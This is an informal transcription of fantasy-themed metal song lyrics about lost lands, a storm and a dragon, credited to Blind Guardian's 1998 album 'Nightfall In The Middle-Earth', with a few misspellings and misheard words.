Sure the no way to turn it
; Back to the old days
; Of bliss and cheerful laughter; We're Lost in Barren Lands
Caught in the Running Flames
Alone
;
How Shall We Leave The Lost Road
; Time's Getting Short So Follow Me
A Leader's Task So Clearly
To find a path out of the Dark
;
(chorus)
;
Even though
The Storm Calmed Down
The bitter end
IS Just a Matter of Time
;
Shall We Dare The Dragon
; Mercyless He's Poisoning Our Hearts
Urhearts
;
HOW ...
(chorus)
;
; ----
Copyright (c) 1998 by Blind Guardian; "Nightfall In The Middle-Earth" Album
;
